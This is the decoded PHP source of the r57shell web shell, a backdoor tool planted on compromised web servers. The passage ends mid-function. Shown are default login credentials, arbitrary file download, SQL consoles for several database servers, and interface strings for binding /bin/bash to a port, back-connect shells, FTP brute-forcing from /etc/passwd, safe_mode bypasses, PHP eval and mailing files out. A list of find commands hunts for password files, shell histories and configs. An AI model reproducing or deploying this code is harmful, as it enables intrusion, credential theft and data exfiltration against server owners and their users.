r57shell

/* Decoded by unphp.net */ $language='eng';$auth=0 ;$name='r57';$pass='r57';error_reporting(0 );set_magic_quotes_runtime(0 );@set_time_limit(0 );@ini_set('max_execution_time',0 );@ini_set('output_buffering',0 );$safe_mode=@ini_get('safe_mode');$version="1.24 / 1.7.2";if(version_compare(phpversion(),'4.1.0')==-1 ){$_POST=&$_POST;$_GET=&$_GET;$_SERVER=&$_SERVER;}if(@get_magic_quotes_gpc()){foreach($_POST as $k=>$v){$_POST[$k]=stripslashes($v);}foreach($_SERVER as $k=>$v){$_SERVER[$k]=stripslashes($v);}}if($auth==1 ){if(!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass){header('WWW-Authenticate: Basic realm="r57shell"');header('HTTP/1.0 401 Unauthorized');exit("r57shell : Access Denied");}}$head=' r57shell ';class dbmysql{var $connid=0 ;var $result='';var $errormsg='';var $lang=array("err1"=>"Unable to select database!","err2"=>"No connection to the database!","err3"=>"Unable to execute query: ");var $errorShow=1 ;var $errorExit=1 ;var $char="";function dbmysql($server,$user,$password,$database,$char=null){$this->char=($char!=null)?$char:"cp1251";$this->server=$server;$this->user=$user;$this->password=$password;$this->database=$database;if($this->connid==0 ){$this->connid=@mysql_connect($this->server,$this->user,$this->password);mysql_query("SET NAMES '".$this->char."'");mysql_query("SET CHARACTER SET '".$this->char."'");if($this->connid){if($this->database!=""){if(@mysql_select_db($this->database,$this->connid)){return $this->connid;}else {$this->errormsg=$this->lang['err1'];$this->error();}}}else {$this->errormsg=$this->lang['err2'];$this->error();}}}function query($query=''){$this->result='';if($query){$this->result=@mysql_query($query,$this->connid);}if($this->result){return $this->result;}else {$this->errormsg=$this->lang['err3'].$query;$this->error();false;}}function fetchrow($query=0 ){return @mysql_fetch_array($query);}function count($query=0 ){return @mysql_num_rows($query);}function escape($inp){return @mysql_escape_string($inp);}function error(){if($this->errorShow==1 ){print $this->errormsg;}if($this->errorExit==1 ){exit();}}function fetchrowArr($query){$result=array();while($item=$this->fetchrow($query)){$result[]=$item;}return $result;}function queryArr($query){return $this->fetchrowArr($this->query($query));}}class zipfile{var $datasec=array();var $ctrl_dir=array();var $eof_ctrl_dir="\x50\x4b\x05\x06\x00\x00\x00\x00";var $old_offset=0 ;function unix2DosTime($unixtime=0 ){$timearray=($unixtime==0 )?getdate():getdate($unixtime);if($timearray['year']<1980 ){$timearray['year']=1980 ;$timearray['mon']=1 ;$timearray['mday']=1 ;$timearray['hours']=0 ;$timearray['minutes']=0 ;$timearray['seconds']=0 ;}return (($timearray['year']-1980 )<<25 )|($timearray['mon']<<21 )|($timearray['mday']<<16 )|($timearray['hours']<<11 )|($timearray['minutes']<<5 )|($timearray['seconds']>>1 );}function addFile($data,$name,$time=0 ){$name=str_replace('\\','/',$name);$dtime=dechex($this->unix2DosTime($time));$hexdtime='\x'.$dtime[6 ].$dtime[7 ].'\x'.$dtime[4 ].$dtime[5 ].'\x'.$dtime[2 ].$dtime[3 ].'\x'.$dtime[0 ].$dtime[1 ];eval('$hexdtime = "'.$hexdtime.'";');$fr="\x50\x4b\x03\x04";$fr.="\x14\x00";$fr.="\x00\x00";$fr.="\x08\x00";$fr.=$hexdtime;$unc_len=strlen($data);$crc=crc32($data);$zdata=gzcompress($data);$zdata=substr(substr($zdata,0 ,strlen($zdata)-4 ),2 );$c_len=strlen($zdata);$fr.=pack('V',$crc);$fr.=pack('V',$c_len);$fr.=pack('V',$unc_len);$fr.=pack('v',strlen($name));$fr.=pack('v',0 );$fr.=$name;$fr.=$zdata;$this->datasec[]=$fr;$cdrec="\x50\x4b\x01\x02";$cdrec.="\x00\x00";$cdrec.="\x14\x00";$cdrec.="\x00\x00";$cdrec.="\x08\x00";$cdrec.=$hexdtime;$cdrec.=pack('V',$crc);$cdrec.=pack('V',$c_len);$cdrec.=pack('V',$unc_len);$cdrec.=pack('v',strlen($name));$cdrec.=pack('v',0 );$cdrec.=pack('v',0 );$cdrec.=pack('v',0 );$cdrec.=pack('v',0 );$cdrec.=pack('V',32 );$cdrec.=pack('V',$this->old_offset);$this->old_offset+=strlen($fr);$cdrec.=$name;$this->ctrl_dir[]=$cdrec;}function file(){$data=implode('',$this->datasec);$ctrldir=implode('',$this->ctrl_dir);return $data.$ctrldir.$this->eof_ctrl_dir.pack('v',sizeof($this->ctrl_dir)).pack('v',sizeof($this->ctrl_dir)).pack('V',strlen($ctrldir)).pack('V',strlen($data))."\x00\x00";}}function compress(&$filename,&$filedump,$compress){global $content_encoding;global $mime_type;if($compress=='bzip' && @function_exists('bzcompress')){$filename.='.bz2';$mime_type='application/x-bzip2';$filedump=bzcompress($filedump);}else if($compress=='gzip' && @function_exists('gzencode')){$filename.='.gz';$content_encoding='x-gzip';$mime_type='application/x-gzip';$filedump=gzencode($filedump);}else if($compress=='zip' && @function_exists('gzcompress')){$filename.='.zip';$mime_type='application/zip';$zipfile=new zipfile();$zipfile->addFile($filedump,substr($filename,0 ,-4 ));$filedump=$zipfile->file();}else {$mime_type='application/octet-stream';}}function mailattach($to,$from,$subj,$attach){$headers="From: $from\r\n";$headers.="MIME-Version: 1.0\r\n";$headers.="Content-Type: ".$attach['type'];$headers.="; name=\"".$attach['name']."\"\r\n";$headers.="Content-Transfer-Encoding: base64\r\n\r\n";$headers.=chunk_split(base64_encode($attach['content']))."\r\n";if(@mail($to,$subj,"",$headers)){return 1 ;}return 0 ;}if(isset($_GET['mysql_query'])){$mysqlServer=(isset($_POST['mysqlServer']))?$_POST['mysqlServer']:'localhost';$mysqlUser=(isset($_POST['mysqlUser']))?$_POST['mysqlUser']:'root';$mysqlPwd=(isset($_POST['mysqlPwd']))?$_POST['mysqlPwd']:'';$mysqlDb=(isset($_POST['mysqlDb']))?$_POST['mysqlDb']:'';$mysqlQuery=(isset($_POST['mysqlQuery']))?$_POST['mysqlQuery']:'';print $head;print '

Mysql query

';print '';print '';print '';print '';print '

';print '';print '

Examples:
';print "WordPress: SELECT `option_name`,`option_value` FROM `wp_options` WHERE `option_name` = 'template' OR `option_name` = 'siteurl'";print '

';print "

[ BACK ]

";die();}if(isset($_GET['img']) && !empty($_GET['img'])){$images=array();$images[1 ]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';$images[2 ]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';@ob_clean();header("Content-type: image/gif");echo base64_decode($images[$_GET['img']]);die();}if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])){if(!$file=@fopen($_POST['d_name'],"r")){echo re($_POST['d_name']);$_POST['cmd']="";}else {@ob_clean();$filename=@basename($_POST['d_name']);$filedump=@fread($file,@filesize($_POST['d_name']));fclose($file);$content_encoding=$mime_type='';compress($filename,$filedump,$_POST['compress']);if(!empty($content_encoding)){header('Content-Encoding: '.$content_encoding);}header("Content-type: ".$mime_type);header("Content-disposition: attachment; filename=\"".$filename."\";");echo $filedump;exit();}}if(isset($_GET['phpinfo'])){echo @phpinfo();echo "

[ BACK ]

";die();}if($_POST['cmd']=="db_query"){echo $head;switch($_POST['db']){case 'MySQL':if(empty($_POST['db_port'])){$_POST['db_port']='3306';}$db=@mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);if($db){if(!empty($_POST['mysql_db'])){@mysql_select_db($_POST['mysql_db'],$db);}$querys=@explode(';',$_POST['db_query']);foreach($querys as $num=>$query){if(strlen($query)>5 ){echo "Query#".$num." : ".htmlspecialchars($query)."
";$res=@mysql_query($query,$db);$error=@mysql_error($db);if($error){echo "

Error : ".$error."

";}else {if(@mysql_num_rows($res)>0 ){$sql2=$sql=$keys=$values='';while(($row=@mysql_fetch_assoc($res))){$keys=@implode("  ",@array_keys($row));$values=@array_values($row);foreach($values as $k=>$v){$values[$k]=htmlspecialchars($v);}$values=@implode("  ",$values);$sql2.=" ".$values." ";}echo "";$sql="";$sql.=$sql2;echo $sql;echo "
".$keys."

";}else {if(($rows=@mysql_affected_rows($db))>=0 ){echo "
affected rows : ".$rows."

";}}}@mysql_free_result($res);}}@mysql_close($db);}else echo "
Can't connect to MySQL server
";break;case 'MSSQL':if(empty($_POST['db_port'])){$_POST['db_port']='1433';}$db=@mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);if($db){if(!empty($_POST['mysql_db'])){@mssql_select_db($_POST['mysql_db'],$db);}$querys=@explode(';',$_POST['db_query']);foreach($querys as $num=>$query){if(strlen($query)>5 ){echo "Query#".$num." : ".htmlspecialchars($query)."
";$res=@mssql_query($query,$db);if(@mssql_num_rows($res)>0 ){$sql2=$sql=$keys=$values='';while(($row=@mssql_fetch_assoc($res))){$keys=@implode("  ",@array_keys($row));$values=@array_values($row);foreach($values as $k=>$v){$values[$k]=htmlspecialchars($v);}$values=@implode("  ",$values);$sql2.=" ".$values." ";}echo "";$sql="";$sql.=$sql2;echo $sql;echo "
".$keys."

";}@mssql_free_result($res);}}@mssql_close($db);}else echo "
Can't connect to MSSQL server
";break;case 'PostgreSQL':if(empty($_POST['db_port'])){$_POST['db_port']='5432';}$str="host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";$db=@pg_connect($str);if($db){$querys=@explode(';',$_POST['db_query']);foreach($querys as $num=>$query){if(strlen($query)>5 ){echo "Query#".$num." : ".htmlspecialchars($query)."
";$res=@pg_query($db,$query);$error=@pg_errormessage($db);if($error){echo "
Error : ".$error."

";}else {if(@pg_num_rows($res)>0 ){$sql2=$sql=$keys=$values='';while(($row=@pg_fetch_assoc($res))){$keys=@implode("  ",@array_keys($row));$values=@array_values($row);foreach($values as $k=>$v){$values[$k]=htmlspecialchars($v);}$values=@implode("  ",$values);$sql2.=" ".$values." ";}echo "";$sql="";$sql.=$sql2;echo $sql;echo "
".$keys."

";}else {if(($rows=@pg_affected_rows($res))>=0 ){echo "
affected rows : ".$rows."

";}}}@pg_free_result($res);}}@pg_close($db);}else echo "
Can't connect to PostgreSQL server
";break;case 'Oracle':$db=@ocilogon($_POST['mysql_l'],$_POST['mysql_p'],$_POST['mysql_db']);if(($error=@ocierror())){echo "
Can't connect to Oracle server.
".$error['message']."
";}else {$querys=@explode(';',$_POST['db_query']);foreach($querys as $num=>$query){if(strlen($query)>5 ){echo "Query#".$num." : ".htmlspecialchars($query)."
";$stat=@ociparse($db,$query);@ociexecute($stat);if(($error=@ocierror())){echo "
Error : ".$error['message']."

";}else {$rowcount=@ocirowcount($stat);if($rowcount!=0 ){echo "
affected rows : ".$rowcount."

";}else {echo "";for($j=1 ;$j<=@ocinumcols($stat);$j++){echo "";}echo "";while(ocifetch($stat)){echo "";for($j=1 ;$j<=@ocinumcols($stat);$j++){echo "";}echo "";}echo "
".htmlspecialchars(@ocicolumnname($stat,$j))."
".htmlspecialchars(@ociresult($stat,$j))."

";}@ocifreestatement($stat);}}}@ocilogoff($db);}break;}echo "
";echo in('hidden','db',0 ,$_POST['db']);echo in('hidden','db_port',0 ,$_POST['db_port']);echo in('hidden','mysql_l',0 ,$_POST['mysql_l']);echo in('hidden','mysql_p',0 ,$_POST['mysql_p']);echo in('hidden','mysql_db',0 ,$_POST['mysql_db']);echo in('hidden','cmd',0 ,'db_query');echo "
".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."

";echo "
";echo "
[ BACK ]
";die();}if(isset($_GET['delete'])){@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1 ));}if(isset($_GET['tmp'])){@unlink("/tmp/bdpl");@unlink("/tmp/back");@unlink("/tmp/bd");@unlink("/tmp/bd.c");@unlink("/tmp/dp");@unlink("/tmp/dpc");@unlink("/tmp/dpc.c");}if(isset($_GET['phpini'])){echo $head;function U_value($value){if($value=='')return 'no value';if(@is_bool($value))return $value?'TRUE':'FALSE';if($value===null)return 'NULL';if(@is_object($value))$value=(array)$value;if(@is_array($value)){@ob_start();print_r($value);$value=@ob_get_contents();@ob_end_clean();}return U_wordwrap((string)$value);}function U_wordwrap($str){$str=@wordwrap(@htmlspecialchars($str),100 ,'',true);return @preg_replace('!(&[^;]*)([^;]*;)!','$1$2',$str);}if(@function_exists('ini_get_all')){$r='';echo '','';foreach(@ini_get_all() as $key=>$value){$r.='';}echo $r;echo '
Directive
Local Value
Master Value
'.ws(3 ).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
';}echo "
[ BACK ]
";die();}if(isset($_GET['cpu'])){echo $head;echo '
CPU
';$cpuf=@file("cpuinfo");if($cpuf){$c=@sizeof($cpuf);for($i=0 ;$i<$c;$i++){$info=@explode(":",$cpuf[$i]);if($info[1 ]==""){$info[1 ]="---";}$r.='';}echo $r;}else {echo '';}echo '
'.ws(3 ).''.trim($info[0 ]).'
'.trim($info[1 ]).'
'.ws(3 ).'
---
';echo "
[ BACK ]
";die();}if(isset($_GET['mem'])){echo $head;echo '
MEMORY
';$memf=@file("meminfo");if($memf){$c=sizeof($memf);for($i=0 ;$i<$c;$i++){$info=explode(":",$memf[$i]);if($info[1 ]==""){$info[1 ]="---";}$r.='';}echo $r;}else {echo '';}echo '
'.ws(3 ).''.trim($info[0 ]).'
'.trim($info[1 ]).'
'.ws(3 ).'
---
';echo "
[ BACK ]
";die();}$lang=array('ru_text1'=>'Âûïîëíåííàÿ êîìàíäà','ru_text2'=>'Âûïîëíåíèå êîìàíä íà ñåðâåðå','ru_text3'=>'Âûïîëíèòü êîìàíäó','ru_text4'=>'Ðàáî÷àÿ äèðåêòîðèÿ','ru_text5'=>'Çàãðóçêà ôàéëîâ íà ñåðâåð','ru_text6'=>'Ëîêàëüíûé ôàéë','ru_text7'=>'Àëèàñû','ru_text8'=>'Âûáåðèòå àëèàñ','ru_butt1'=>'Âûïîëíèòü','ru_butt2'=>'Çàãðóçèòü','ru_text9'=>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash','ru_text10'=>'Îòêðûòü ïîðò','ru_text11'=>'Ïàðîëü äëÿ äîñòóïà','ru_butt3'=>'Îòêðûòü','ru_text12'=>'back-connect','ru_text13'=>'IP-àäðåñ','ru_text14'=>'Ïîðò','ru_butt4'=>'Âûïîëíèòü','ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà','ru_text16'=>'Èñïîëüçîâàòü','ru_text17'=>'Óäàëåííûé ôàéë','ru_text18'=>'Ëîêàëüíûé ôàéë','ru_text19'=>'Exploits','ru_text20'=>'Èñïîëüçîâàòü','ru_text21'=>'Íîâîå èìÿ','ru_text22'=>'datapipe','ru_text23'=>'Ëîêàëüíûé ïîðò','ru_text24'=>'Óäàëåííûé õîñò','ru_text25'=>'Óäàëåííûé ïîðò','ru_text26'=>'Èñïîëüçîâàòü','ru_butt5'=>'Çàïóñòèòü','ru_text28'=>'Ðàáîòà â safe_mode','ru_text29'=>'Äîñòóï çàïðåùåí','ru_butt6'=>'Ñìåíèòü','ru_text30'=>'Ïðîñìîòð ôàéëà','ru_butt7'=>'Âûâåñòè','ru_text31'=>'Ôàéë íå íàéäåí','ru_text32'=>'Âûïîëíåíèå PHP êîäà','ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL','ru_butt8'=>'Ïðîâåðèòü','ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include','ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql','ru_text36'=>'Áàçà','ru_text37'=>'Ëîãèí','ru_text38'=>'Ïàðîëü','ru_text39'=>'Òàáëèöà','ru_text40'=>'Äàìï òàáëèöû áàçû äàííûõ','ru_butt9'=>'Äàìï','ru_text41'=>'Ñîõðàíèòü â ôàéëå','ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà','ru_text43'=>'Ðåäàêòèðîâàòü ôàéë','ru_butt10'=>'Ñîõðàíèòü','ru_butt11'=>'Ðåäàêòèðîâàòü','ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!','ru_text45'=>'Ôàéë ñîõðàíåí','ru_text46'=>'Ïðîñìîòð phpinfo()','ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini','ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ','ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà','ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå','ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè','ru_text52'=>'Òåêñò äëÿ ïîèñêà','ru_text53'=>'Èñêàòü â ïàïêå','ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ','ru_butt12'=>'Íàéòè','ru_text55'=>'Òîëüêî â ôàéëàõ','ru_text56'=>'Íè÷åãî íå íàéäåíî','ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ','ru_text58'=>'Èìÿ','ru_text59'=>'Ôàéë','ru_text60'=>'Äèðåêòîðèþ','ru_butt13'=>'Ñîçäàòü/Óäàëèòü','ru_text61'=>'Ôàéë ñîçäàí','ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà','ru_text63'=>'Ôàéë óäàëåí','ru_text64'=>'Äèðåêòîðèÿ óäàëåíà','ru_text65'=>'Ñîçäàòü','ru_text66'=>'Óäàëèòü','ru_text67'=>'Chown/Chgrp/Chmod','ru_text68'=>'Êîìàíäà','ru_text69'=>'Ïàðàìåòð1','ru_text70'=>'Ïàðàìåòð2','ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",'ru_text72'=>'Òåêñò äëÿ ïîèñêà','ru_text73'=>'Èñêàòü â ïàïêå','ru_text74'=>'Èñêàòü â ôàéëàõ','ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå','ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find','ru_text77'=>'Ïðîñìîòð ñòðóêòóðû áàçû äàííûõ','ru_text78'=>'Ïîêàçûâàòü òàáëèöû','ru_text79'=>'Ïîêàçûâàòü ñòîëáöû','ru_text80'=>'Òèï','ru_text81'=>'Ñåòü','ru_text82'=>'Áàçû äàííûõ','ru_text83'=>'Âûïîëíåíèå SQL çàïðîñà','ru_text84'=>'SQL çàïðîñ','ru_text85'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç âûïîëíåíèå êîìàíä â MSSQL ñåðâåðå','ru_text86'=>'Ñêà÷èâàíèå ôàéëà ñ ñåðâåðà','ru_butt14'=>'Ñêà÷àòü','ru_text87'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ftp-ñåðâåðà','ru_text88'=>'FTP-ñåðâåð:ïîðò','ru_text89'=>'Ôàéë íà ftp ñåðâåðå','ru_text90'=>'Ðåæèì ïåðåäà÷è','ru_text91'=>'Àðõèâèðîâàòü â','ru_text92'=>'áåç àðõèâàöèè','ru_text93'=>'FTP','ru_text94'=>'FTP-áðóòôîðñ','ru_text95'=>'Ñïèñîê ïîëüçîâàòåëåé','ru_text96'=>'Íå óäàëîñü ïîëó÷èòü ñïèñîê ïîëüçîâàòåëåé','ru_text97'=>'Ïðîâåðåíî êîìáèíàöèé: ','ru_text98'=>'Óäà÷íûõ ïîäêëþ÷åíèé: ','ru_text99'=>'* â êà÷åñòâå ëîãèíà è ïàðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâàòåëÿ èç /etc/passwd','ru_text100'=>'Îòïðàâêà ôàéëîâ íà óäàëåííûé ôòï ñåðâåð','ru_text101'=>'Èñïîëüçîâàòü òàêæå ïåðåâåðíóòîå (user -> resu) èìÿ ïîëüçîâàòåëÿ â êà÷åñòâå ïàðîëÿ','ru_text102'=>'Ïî÷òà','ru_text103'=>'Îòïðàâêà ïèñüìà','ru_text104'=>'Îòïðàâêà ôàéëà íà ïî÷òîâûé ÿùèê','ru_text105'=>'Êîìó','ru_text106'=>'Îò','ru_text107'=>'Òåìà','ru_butt15'=>'Îòïðàâèòü','ru_text108'=>'Òåêñò ïèñüìà','ru_text109'=>'Ñâåðíóòü','ru_text110'=>'Ðàçâåðíóòü','eng_text1'=>'Executed command','eng_text2'=>'Execute command on server','eng_text3'=>'Run command','eng_text4'=>'Work directory','eng_text5'=>'Upload files on server','eng_text6'=>'Local file','eng_text7'=>'Aliases','eng_text8'=>'Select alias','eng_butt1'=>'Execute','eng_butt2'=>'Upload','eng_text9'=>'Bind port to /bin/bash','eng_text10'=>'Port','eng_text11'=>'Password for access','eng_butt3'=>'Bind','eng_text12'=>'back-connect','eng_text13'=>'IP','eng_text14'=>'Port','eng_butt4'=>'Connect','eng_text15'=>'Upload files from remote server','eng_text16'=>'With','eng_text17'=>'Remote file','eng_text18'=>'Local file','eng_text19'=>'Exploits','eng_text20'=>'Use','eng_text21'=>' New name','eng_text22'=>'datapipe','eng_text23'=>'Local port','eng_text24'=>'Remote host','eng_text25'=>'Remote port','eng_text26'=>'Use','eng_butt5'=>'Run','eng_text28'=>'Work in safe_mode','eng_text29'=>'ACCESS DENIED','eng_butt6'=>'Change','eng_text30'=>'Cat file','eng_butt7'=>'Show','eng_text31'=>'File not found','eng_text32'=>'Eval PHP code','eng_text33'=>'Test bypass open_basedir with cURL functions','eng_butt8'=>'Test','eng_text34'=>'Test bypass safe_mode with include function','eng_text35'=>'Test bypass safe_mode with load file in mysql','eng_text36'=>'Database','eng_text37'=>'Login','eng_text38'=>'Password','eng_text39'=>'Table','eng_text40'=>'Dump database table','eng_butt9'=>'Dump','eng_text41'=>'Save dump in file','eng_text42'=>'Edit files','eng_text43'=>'File for edit','eng_butt10'=>'Save','eng_text44'=>'Can\'t edit file! Only read access!','eng_text45'=>'File saved','eng_text46'=>'Show phpinfo()','eng_text47'=>'Show variables from php.ini','eng_text48'=>'Delete temp files','eng_butt11'=>'Edit file','eng_text49'=>'Delete script from server','eng_text50'=>'View cpu info','eng_text51'=>'View memory info','eng_text52'=>'Find text','eng_text53'=>'In dirs','eng_text54'=>'Find text in files','eng_butt12'=>'Find','eng_text55'=>'Only in files','eng_text56'=>'Nothing :(','eng_text57'=>'Create/Delete File/Dir','eng_text58'=>'Name','eng_text59'=>'File','eng_text60'=>'Dir','eng_butt13'=>'Create/Delete','eng_text61'=>'File created','eng_text62'=>'Dir created','eng_text63'=>'File deleted','eng_text64'=>'Dir deleted','eng_text65'=>'Create','eng_text66'=>'Delete','eng_text67'=>'Chown/Chgrp/Chmod','eng_text68'=>'Command','eng_text69'=>'param1','eng_text70'=>'param2','eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",'eng_text72'=>'Text for find','eng_text73'=>'Find in folder','eng_text74'=>'Find in files','eng_text75'=>'* you can use regexp','eng_text76'=>'Search text in files via find','eng_text77'=>'Show database structure','eng_text78'=>'Show tables','eng_text79'=>'Show columns','eng_text80'=>'Type','eng_text81'=>'Net','eng_text82'=>'Databases','eng_text83'=>'Run SQL query','eng_text84'=>'SQL query','eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server','eng_text86'=>'Download files from server','eng_butt14'=>'Download','eng_text87'=>'Download files from remote ftp-server','eng_text88'=>'FTP-server:port','eng_text89'=>'File on ftp','eng_text90'=>'Transfer mode','eng_text91'=>'Archivation','eng_text92'=>'without archivation','eng_text93'=>'FTP','eng_text94'=>'FTP-bruteforce','eng_text95'=>'Users list','eng_text96'=>'Can\'t get users list','eng_text97'=>'Checked: ','eng_text98'=>'Success: ','eng_text99'=>'* use username from /etc/passwd for ftp login and password','eng_text100'=>'Send file to remote ftp server','eng_text101'=>'Use reverse (user -> resu) login for password','eng_text102'=>'Mail','eng_text103'=>'Send email','eng_text104'=>'Send file to email','eng_text105'=>'To','eng_text106'=>'From','eng_text107'=>'Subj','eng_butt15'=>'Send','eng_text108'=>'Mail','eng_text109'=>'Hide','eng_text110'=>'Show',);$aliases=array('find suid files'=>'find / -type f -perm -04000 -ls','find suid files in current dir'=>'find . -type f -perm -04000 -ls','find sgid files'=>'find / -type f -perm -02000 -ls','find sgid files in current dir'=>'find . -type f -perm -02000 -ls','find config.inc.php files'=>'find / -type f -name config.inc.php','find config.inc.php files in current dir'=>'find . -type f -name config.inc.php','find config* files'=>'find / -type f -name "config*"','find config* files in current dir'=>'find . -type f -name "config*"','find all writable files'=>'find / -type f -perm -2 -ls','find all writable files in current dir'=>'find . -type f -perm -2 -ls','find all writable directories'=>'find / -type d -perm -2 -ls','find all writable directories in current dir'=>'find . -type d -perm -2 -ls','find all writable directories and files'=>'find / -perm -2 -ls','find all writable directories and files in current dir'=>'find . -perm -2 -ls','find all service.pwd files'=>'find / -type f -name service.pwd','find service.pwd files in current dir'=>'find . -type f -name service.pwd','find all .htpasswd files'=>'find / -type f -name .htpasswd','find .htpasswd files in current dir'=>'find . -type f -name .htpasswd','find all .bash_history files'=>'find / -type f -name .bash_history','find .bash_history files in current dir'=>'find . -type f -name .bash_history','find all .mysql_history files'=>'find / -type f -name .mysql_history','find .mysql_history files in current dir'=>'find . -type f -name .mysql_history','find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc','find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc','list file attributes on a Linux second extended file system'=>'lsattr -va','show opened ports'=>'netstat -an | grep -i listen','----------------------------------------------------------------------------------------------------'=>'ls -la');$table_up1=":: ";$table_up2=" ::
";$table_up3="";$arrow=" ";$lb="[";$rb="]";$font="";$ts="
";$table_end1="
";$te="
";$fs="
";$fe="
";if(isset($_GET['users'])){if(!$users=shell_get_users()){echo "".$lang[$language.'_text96']."";}else {echo '';foreach($users as $user){echo $user."
";}echo '';}echo "
[ BACK ]
";die();}if(!empty($_POST['dir'])){@chdir($_POST['dir']);}$dir=@getcwd();$windows=0 ;$unix=0 ;if(strlen($dir)>1 && $dir[1 ]==":")$windows=1 ;else $unix=1 ;if(empty($dir)){$os=getenv('OS');if(empty($os)){$os=php_uname();}if(empty($os)){$os="-";$unix=1 ;}else {if(@eregi("^win",$os)){$windows=1 ;}else {$unix=1 ;}}}if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd']=="search_text"){echo $head;if(!empty($_POST['s_mask']) && !empty($_POST['m'])){$sr=new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);}else {$sr=new SearchResult($_POST['s_dir'],$_POST['s_text']);}$sr->SearchText(0 ,0 );$res=$sr->GetResultFiles();$found=$sr->GetMatchesCount();$titles=$sr->GetTitles();$r="";if($found>0 ){$r.="";foreach($res as $file=>$v){$r.="";$r.="";foreach($v as $a=>$b){$r.="";$r.="";$r.="";$r.="\n";}}$r.="
".ws(3 );$r.=($windows)?str_replace("/","\\",$file):$file;$r.="";$r.="
".$a." ".ws(2 ).$b."
";echo $r;}else {echo "
".$lang[$language.'_text56']."
";}echo "
[ BACK ]
";die();}if(strpos(ex("echo abcr57"),"r57")!=3 ){$safe_mode=1 ;}$SERVER_SOFTWARE=getenv('SERVER_SOFTWARE');if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE="-";}function ws($i){return @str_repeat(" ",$i);}function ex($cfe){$res='';if(!empty($cfe)){}return $res;}function shell_get_users(){$users=array();$rows=file('/etc/passwd');if(!$rows)return 0 ;foreach($rows as $string){$user=@explode(":",$string);if(substr($string,0 ,1 )!='#')array_push($users,$user[0 ]);}return $users;}function we($i){if($GLOBALS['language']=="ru"){$text='Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë ';}else {$text="[-] ERROR! Can't write in file ";}echo "
".$text.$i."
";return null;}function re($i){if($GLOBALS['language']=="ru"){$text='Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë ';}else {$text="[-] ERROR! Can't read file ";}echo "
".$text.$i."
";return null;}function ce($i){if($GLOBALS['language']=="ru"){$text="Íå óäàëîñü ñîçäàòü ";}else {$text="Can't create ";}echo "
".$text.$i."
";return null;}function fe($l,$n){$text['ru']=array('Íå óäàëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðâåðó','Îøèáêà àâòîðèçàöèè íà ftp ñåðâåðå','Íå óäàëîñü ïîìåíÿòü äèðåêòîðèþ íà ftp ñåðâåðå');$text['eng']=array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');echo "
".$text[$l][$n]."
";return null;}function mr($l,$n){$text['ru']=array('Íå óäàëîñü îòïðàâèòü ïèñüìî','Ïèñüìî îòïðàâëåíî');$text['eng']=array('Can\'t send mail','Mail sent');echo "
".$text[$l][$n]."
